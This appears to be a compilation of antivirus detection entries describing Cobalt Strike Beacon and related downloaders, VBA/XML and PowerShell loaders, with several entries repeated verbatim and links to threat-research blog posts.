This is a detection for the VBA file with XML content (commonly used in Microsoft Office files such as Excel, Word, and PowerPoint). The XML content is responsible for downloading the Cobalt Strike loader from the intended malicious URL.

Cobalt Strike is a commercially available penetration testing tool used for adversary simulation.  It’s also known for being used by threat actors in various campaigns and found in many pre-ransomware incidents.

For information about Cobalt Strike and other human-operated malware campaigns, read these blog posts: 

• Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity
• The five-day job: A BlackByte ransomware intrusion case study
• Defenders beware: A case for post-ransomware investigations

This is a detection for Cobalt Strike Beacon, which is a software component that gets deployed in target devices and allows an attacker remote access to the device to perform various tasks.

This is a detection for Cobalt Strike Beacon, which is a software component that gets deployed in target devices and allows an attacker remote access to the device to perform various tasks.

This is a detection for Cobalt Strike Beacon, which is a software component that gets deployed in target devices and allows an attacker remote access to the device to perform various tasks.

This is a detection for Cobalt Strike Beacon, which is a software component that gets deployed in target devices and allows an attacker remote access to the device to perform various tasks.

Behavior:Win32/CobaltStrike detects various generic behaviors exhibited by CobaltStrike Beacon.

This is a detection for Cobalt Strike Beacon, which is a software component that gets deployed in target devices and allows an attacker remote access to the device to perform various tasks.

This is a detection for Cobalt Strike Beacon, which is a software component that gets deployed in target devices and allows an attacker remote access to the device to perform various tasks.

This threat downloads and installs other programs, including other malware, onto your PC without your consent.

TrojanDownloader:Win32/CobaltStrike is a trojan that downloads and installs the Cobalt Strike beacon.

This is a detection for the PowerShell script responsible for downloading the Cobalt Strike loader from an .onion website or other intended malicious URL.

Cobalt Strike is a commercially available penetration testing tool used for adversary simulation.  It’s also known for being used by threat actors in various campaigns and found in many pre-ransomware incidents.

Read the following blogs for details:

• Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity
• The five-day job: A BlackByte ransomware intrusion case study
• Using Python to unearth a goldmine of threat intelligence from leaked chat logs